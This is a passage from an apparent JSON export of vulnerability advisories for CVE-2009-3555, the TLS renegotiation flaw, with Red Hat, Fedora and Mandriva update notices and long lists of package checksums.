arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. (CVE-2009-3555)\n\nThis update disables renegotiation in the non-default IBM JSSE2 provider\nfor the Java Secure Socket Extension (JSSE) component. The default JSSE\nprovider is not updated with this fix. Refer to the IBMJSSE2 Provider\nReference Guide, linked to in the References, for instructions on how to\nconfigure the IBM Java 2 Runtime Environment to use the JSSE2 provider by\ndefault.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nThis update also fixes the following bug:\n\n* the libjaasauth.so file was missing from the java-1.4.2-ibm packages for\nthe Intel Itanium architecture (.ia64.rpm). This update adds the file to\nthe packages for the Itanium architecture, which resolves this issue.\n(BZ#572577)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP4 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2010-03-17T04:00:00", "id": "RHSA-2010:0155", "href": "https://access.redhat.com/errata/RHSA-2010:0155", "type": "redhat", "title": "(RHSA-2010:0155) Moderate: java-1.4.2-ibm security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-02-05T01:40:58", "published": "2010-02-05T01:40:58", "id": "FEDORA:61A8C10FC13", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: nss-3.12.5-8.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Utilities for Network Security Services and the Softoken module ", "modified": "2009-12-10T04:13:15", "published": "2009-12-10T04:13:15", "id": "FEDORA:0C0C510F85F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: nss-util-3.12.5-1.fc12.1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-11T13:25:20", "published": "2010-03-11T13:25:20", "id": "FEDORA:0FD0F10F8DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: nss-3.12.6-1.2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implem ents the proposed standards by the IETF's TLS working group. ", "modified": "2010-06-22T17:21:05", "published": "2010-06-22T17:21:05", "id": "FEDORA:6A214110D58", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: gnutls-2.8.6-2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directo ry visibility. This package defaults to the standalone behaviour of ProFTPD, but all the needed scripts to have it run by xinetd instead are included. ", "modified": "2009-12-27T20:24:34", "published": "2009-12-27T20:24:34", "id": "FEDORA:4C4E710F878", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: proftpd-1.3.2c-1.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-23T02:03:18", "published": "2010-03-23T02:03:18", "id": "FEDORA:E3F6C10FD89", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: nss-3.12.6-1.2.fc11", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:295\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apache\r\n Date : November 8, 2009\r\n Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability was discovered and corrected in apache:\r\n \r\n Apache is affected by SSL injection or man-in-the-middle attacks\r\n due to a design flaw in the SSL and/or TLS protocols. A short term\r\n solution was released Sat Nov 07 2009 by the ASF team to mitigate\r\n these problems. Apache will now reject in-session renegotiation\r\n &#40;CVE-2009-3555&#41;.\r\n \r\n Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.\r\n \r\n This update provides a solution to this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n http://marc.info/?l=apache-httpd-announce&amp;m=125755783724966&amp;w=2\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n bb7817c8fd6d45007367f738772a6bf3 2009.0/i586/apache-base-2.2.9-12.5mdv2009.0.i586.rpm\r\n f8726194a60735e448281060ae4b36da 2009.0/i586/apache-devel-2.2.9-12.5mdv2009.0.i586.rpm\r\n fbe7be6f33026519e367e66e0b562340 2009.0/i586/apache-htcacheclean-2.2.9-12.5mdv2009.0.i586.rpm\r\n 138023055641f45f4a164e7c971a6a09 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 5e688241469d2d4e99f5fd1dac76fa2f 2009.0/i586/apache-mod_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 467f3e03bb9523d213e34310be245005 2009.0/i586/apache-mod_dav-2.2.9-12.5mdv2009.0.i586.rpm\r\n c19b8084698b3aab5e04c8e398105b64 2009.0/i586/apache-mod_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6c387d03bcf96be55e5668d06468961a 2009.0/i586/apache-mod_deflate-2.2.9-12.5mdv2009.0.i586.rpm\r\n e349b4f55aa3d804295c70b9bddc923d 2009.0/i586/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3a0aca578f2caf6bd6fde3b4ea2d3d3a 2009.0/i586/apache-mod_file_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n ae1cd7db54f7858dcd3cf46316fac109 2009.0/i586/apache-mod_ldap-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6d253c599f47f2aa5f872939bd685880 2009.0/i586/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n df04a63519e442a6c5b1c1a5dc166dce 2009.0/i586/apache-mod_proxy-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0ee61ddcc9ba15f27105ac6e40b33feb 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.i586.rpm\r\n 85bd2fd587538304570dda2ee99997c5 2009.0/i586/apache-mod_ssl-2.2.9-12.5mdv2009.0.i586.rpm\r\n d4eb614eb21ae8fcffcd2200808f733d 2009.0/i586/apache-modules-2.2.9-12.5mdv2009.0.i586.rpm\r\n b14ffea00afa59052bf9fa46d64502d7 2009.0/i586/apache-mod_userdir-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0b50fbd6f26a4215c5a3a6741473f423 2009.0/i586/apache-mpm-event-2.2.9-12.5mdv2009.0.i586.rpm\r\n 84b03ef6c45c982d8e79ae3efa48a039 2009.0/i586/apache-mpm-itk-2.2.9-12.5mdv2009.0.i586.rpm\r\n f2d3438adfafbbd2916fd68e14ab1a5f 2009.0/i586/apache-mpm-peruser-2.2.9-12.5mdv2009.0.i586.rpm\r\n 81da89c424782750e7f48080b36d7b53 2009.0/i586/apache-mpm-prefork-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3ed1f4255c574b656617d5fe8858067c 2009.0/i586/apache-mpm-worker-2.2.9-12.5mdv2009.0.i586.rpm\r\n ecbe5b3f18db2406073e54e58a79bebd 2009.0/i586/apache-source-2.2.9-12.5mdv2009.0.i586.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 71ed1d9246a9412d4da492a3d197540d 2009.0/x86_64/apache-base-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 2dc2a515c8dc7ed51d0a360689f69bd0 2009.0/x86_64/apache-devel-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0e9c6e43d4fed842aed0302bd9a791b1 2009.0/x86_64/apache-htcacheclean-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 694b5febe352ece3681a78fe727f7509 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 7476323e5873c8069b18eb30a6e083b4 2009.0/x86_64/apache-mod_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n da79b5a011f779c6d3a2f7e7a05e87ce 2009.0/x86_64/apache-mod_dav-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8283a2cce0751f50595b959d4a00fb82 2009.0/x86_64/apache-mod_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n ab4b98932e3afd3d93a30929007ac210 2009.0/x86_64/apache-mod_deflate-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3e696b66694d83821c393561e1bc263e 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n c1fd15eb1469a629af3c532ddfa4367f 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 62e77f84a029b5b06f97d0c68598b13c 2009.0/x86_64/apache-mod_ldap-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f4e7eaac49d05c28b9404b5a90744ade 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9a111de2c5b552a8511ff4a58c6cd8b1 2009.0/x86_64/apache-mod_proxy-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 978da0f65f1112b8e8f1f506c728b861 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 898dcdbe09b70afa7c59ca19e1130084 2009.0/x86_64/apache-mod_ssl-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3a96f2129bbde56d1412a074362bb26f 2009.0/x86_64/apache-modules-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f80f2d91501d2dcbf4ea6c1eff3ed4ca 2009.0/x86_64/apache-mod_userdir-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 17c9bb917167139a3b69f7fd5bb5817f 2009.0/x86_64/apache-mpm-event-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n adf43b31e6fce40e28a03dc225408f90 2009.0/x86_64/apache-mpm-itk-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0b1ac1a128b892df681ba5712a6621f1 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8fc055280e0c1ef8e7c5758c855b4439 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 093d7472250b96ef722124e082cba6a5 2009.0/x86_64/apache-mpm-worker-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9956109782f361eb6c98dbcce8f42c7a 2009.0/x86_64/apache-source-2.2.9-12.5mdv2009.0.x86_64.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 94e185add24c4e10121981195c930620 2009.1/i586/apache-base-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7b0c7a2be7dcdd645b7593f63aac6011 2009.1/i586/apache-devel-2.2.11-10.6mdv2009.1.i586.rpm\r\n f580d6b478eef55019c7f038d3b688ab 2009.1/i586/apache-htcacheclean-2.2.11-10.6mdv2009.1.i586.rpm\r\n b10871dc531adee1ecff565108c5c6e4 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n a37da4e13ce3d6e89a3c51b1659d4f92 2009.1/i586/apache-mod_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n f4a0ae7521abffef05e7e9f3930b2e5f 2009.1/i586/apache-mod_dav-2.2.11-10.6mdv2009.1.i586.rpm\r\n 6b0408eedde371ac765f77ce6c21c214 2009.1/i586/apache-mod_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n 9dc3c4df8071b8bb169404c5569d6f93 2009.1/i586/apache-mod_deflate-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7ad5f4ad2f6670be4a89c0be1783aeea 2009.1/i586/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n e695fe99060ffca44c0be14d1cdb04ed 2009.1/i586/apache-mod_file_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n 819cea0e5f59cd42dce452acd0c0c23a 2009.1/i586/apache-mod_ldap-2.2.11-10.6mdv2009.1.i586.rpm\r\n c3ffcfa7d92d1fc79267cb0a8f5b2946 2009.1/i586/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n a3f647d9b03d0f740473f55095932593 2009.1/i586/apache-mod_proxy-2.2.11-10.6mdv2009.1.i586.rpm\r\n f9ca6ceda431aaa1d5cf65f81bb74e29 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.i586.rpm\r\n 8310b77c823aff2f583fa50148f470ff 2009.1/i586/apache-mod_ssl-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2712526500eb75864f53d9abc4ab0e51 2009.1/i586/apache-modules-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2d47c9c2713d57c09dfcc80fe54b2433 2009.1/i586/apache-mod_userdir-2.2.11-10.6mdv2009.1.i586.rpm\r\n 255e720dfd9fa2cd9a44aefd58c6ba44 2009.1/i586/apache-mpm-event-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7425fcb2ea8dd837c5a2354c093e764b 2009.1/i586/apache-mpm-itk-2.2.11-10.6mdv2009.1.i586.rpm\r\n 5bfda50c5f1a6bb0ccb4d3d11c8feb1e 2009.1/i586/apache-mpm-peruser-2.2.11-10.6mdv2009.1.i586.rpm\r\n 44608bdac0bf32c864183440a5aead32 2009.1/i586/apache-mpm-prefork-2.2.11-10.6mdv2009.1.i586.rpm\r\n e8a4b35f1f1200c04a3dfc29d5613d47 2009.1/i586/apache-mpm-worker-2.2.11-10.6mdv2009.1.i586.rpm\r\n e94c33087169b55d533b90b45963c6eb 2009.1/i586/apache-source-2.2.11-10.6mdv2009.1.i586.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 06575f7b7439048b85e0f95479ab6552 2009.1/x86_64/apache-base-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 09f8979708a230d8573195f5af443ba8 2009.1/x86_64/apache-devel-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n c5ac4447e3c98a555bf458d842527a8b 2009.1/x86_64/apache-htcacheclean-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 0ea0c2a44c6490641b0db3bf9f9d7409 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8230b3bb1aa3bd6e31c9825ed4954010 2009.1/x86_64/apache-mod_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7cf8275713a8ea9aaaacd76f978dc542 2009.1/x86_64/apache-mod_dav-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n e99e0b8f90e0cfb803621d33a71fcc2a 2009.1/x86_64/apache-mod_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ded8e4e2b4890559e15874eb662f92cb 2009.1/x86_64/apache-mod_deflate-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n cdb3af03ea373fadccd2f7a626b3f78e \r\n2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 9c4700ffcefc5b647826a6fbff0656d3 \r\n2009.1/x86_64/apache-mod_file_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 122139cc3ce8849b56441f7cc8ef1604 2009.1/x86_64/apache-mod_ldap-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8bc5b5f06bc8f8fcf7df33eb4424a232 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n f43fd5d1dad41550a7e083d72ae711a8 2009.1/x86_64/apache-mod_proxy-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 11fb4de40d40787954bff02fcde4e7b9 2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n b762ddfe0acd03be89a37ee168f79f45 2009.1/x86_64/apache-mod_ssl-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 10b5baf1b7a17673cc7e313c45b34eca 2009.1/x86_64/apache-modules-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8fa6579a4728ea68c20d0d66e870802c 2009.1/x86_64/apache-mod_userdir-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 3ff5897b6496f0cf1c142a158200f9d3 2009.1/x86_64/apache-mpm-event-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7285b05e6050739f199e3ace130adbe7 2009.1/x86_64/apache-mpm-itk-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 51299d866a14149696c0435e7ec6d3a3 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n d17d49f4fb7bb986964dcd261c600dee 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ad6fc82908c310d1be2ccdf4fb4d3ce3 2009.1/x86_64/apache-mpm-worker-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 4a84ec62874c0c91d36819c81d1e0767 2009.1/x86_64/apache-source-2.2.11-10.6mdv2009.1.x86_64.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n d1809e51bc2dbb3a655246e85a95caf0 2010.0/i586/apache-base-2.2.14-1.1mdv2010.0.i586.rpm\r\n a78c15bf2b5e5a75eb7fc8eaa725344a 2010.0/i586/apache-devel-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4f464ba836031170feb0b4e661b34419 2010.0/i586/apache-htcacheclean-2.2.14-1.1mdv2010.0.i586.rpm\r\n 0f75c700952a8384685c8d9e9f31b065 2010.0/i586/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 7d98bab9cd58fae7dc2eb8e7651276de 2010.0/i586/apache-mod_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 5e627fd34f349b2bd2a89e4c9e1f6746 2010.0/i586/apache-mod_dav-2.2.14-1.1mdv2010.0.i586.rpm\r\n fdf016ba91662793af3b5a18b004f6ac 2010.0/i586/apache-mod_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 1088dbea44ae4db977b77198cd564125 2010.0/i586/apache-mod_deflate-2.2.14-1.1mdv2010.0.i586.rpm\r\n c553147aa3bea5f1e455a71fffdfb6bc 2010.0/i586/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 350885b059fb57ed93eb6e7d4f197d3f 2010.0/i586/apache-mod_file_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 83566cb97d796f0ddece9aa90a1ac81a 2010.0/i586/apache-mod_ldap-2.2.14-1.1mdv2010.0.i586.rpm\r\n 3dd06c6346f120722de6d78cf9372079 2010.0/i586/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2e6a0c297c4b443c5327567aa1c7c243 2010.0/i586/apache-mod_proxy-2.2.14-1.1mdv2010.0.i586.rpm\r\n 40771fe728d628bfbfa2287d6f4c3155 2010.0/i586/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.i586.rpm\r\n 259eb6f83c314c314bd9fb08f90743aa 2010.0/i586/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4592b29ddde103e442b0a55486d6b9c2 2010.0/i586/apache-mod_ssl-2.2.14-1.1mdv2010.0.i586.rpm\r\n 829f927a019c51e53edb1a4d2e98c6b4 2010.0/i586/apache-modules-2.2.14-1.1mdv2010.0.i586.rpm\r\n a9a5e28bc8dfb9d4589260d22afb846d 2010.0/i586/apache-mod_userdir-2.2.14-1.1mdv2010.0.i586.rpm\r\n e83d855a1717bdcb5b90471136f43ab2 2010.0/i586/apache-mpm-event-2.2.14-1.1mdv2010.0.i586.rpm\r\n 535262f8fa474ae09f5587a8f690fe06 2010.0/i586/apache-mpm-itk-2.2.14-1.1mdv2010.0.i586.rpm\r\n acfb57b5b632cf0c559e583c7eba5698 2010.0/i586/apache-mpm-peruser-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2b096ca235d6a5965bd9e93451f9465c 2010.0/i586/apache-mpm-prefork-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4799ce79cbaccfdeb627494d10e75d70 2010.0/i586/apache-mpm-worker-2.2.14-1.1mdv2010.0.i586.rpm\r\n 73047099f8f8c6c73eb0bbf912dc242c 2010.0/i586/apache-source-2.2.14-1.1mdv2010.0.i586.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 17403e4a16b7588d58353351f39b5123 2010.0/x86_64/apache-base-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n efbd8d015a1f022995d50aef8fccf514 2010.0/x86_64/apache-devel-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 06f5ab103a5f763361a76ad85f38006d 2010.0/x86_64/apache-htcacheclean-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n cef5c18678dbbdb2a995a2743923b652 2010.0/x86_64/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 6f94396641d7461ed7ac6dee4728a16d 2010.0/x86_64/apache-mod_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d82b85275deb95aa088f2be367720974 2010.0/x86_64/apache-mod_dav-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ff677c2a96d9827c57de63024bf3b325 2010.0/x86_64/apache-mod_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68c028d2759cb4bbfa92be5124c9e82a 2010.0/x86_64/apache-mod_deflate-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 8e83040fd096abe63b523aafc0cd330f 2010.0/x86_64/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n aedf657533f6ef8b87755e33992ae547 2010.0/x86_64/apache-mod_file_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 70b9c3abf78961d732a64c3c0ef777d8 2010.0/x86_64/apache-mod_ldap-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9f5355474bfa4e92b625f8a151f7ad57 2010.0/x86_64/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9c88234150d3538ac4b12c91d81fafdd 2010.0/x86_64/apache-mod_proxy-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 7b131710288ef094929d4c7c3345e38f 2010.0/x86_64/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 11703b4164fac113e64dd5015be06cda 2010.0/x86_64/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n c11b40d2a2bae457207708ba7f60f6d5 2010.0/x86_64/apache-mod_ssl-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n b4e568b230723eb8e9f4361c9023f06d 2010.0/x86_64/apache-modules-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e814f74a0199f669684c00cd4f73e5f5 2010.0/x86_64/apache-mod_userdir-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68bf641f60ef5972aa965f82ccbd2d2b 2010.0/x86_64/apache-mpm-event-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e7a9752d15eba26d1ac072b2e25ee559 2010.0/x86_64/apache-mpm-itk-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n f6a733d163fc33345c5bd2e2104f4337 2010.0/x86_64/apache-mpm-peruser-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ccdcfa4fa39683a78a43f0115cb5e299 2010.0/x86_64/apache-mpm-prefork-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d94ec40a8272788ae9636c444f354c65 2010.0/x86_64/apache-mpm-worker-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 714f9b5de7bcc482988ceac41d186236 2010.0/x86_64/apache-source-2.2.14-1.1mdv2010.0.x86_64.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 445117a109396af9413dca2a69f01a0a corporate/3.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 corporate/3.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 corporate/3.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 corporate/3.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a corporate/3.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 corporate/3.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc \r\ncorporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 \r\ncorporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff \r\ncorporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 corporate/3.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 corporate/3.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f corporate/3.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 8ed8407694197319443b1dc1400d41c6 corporate/3.0/x86_64/apache2-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 6a1163108c43c55a8a55619493d641a0 corporate/3.0/x86_64/apache2-common-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 58151e6d42ced2607936d1b1c213dd32 corporate/3.0/x86_64/apache2-devel-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 99a3c31922d94d203af88a2563d13084 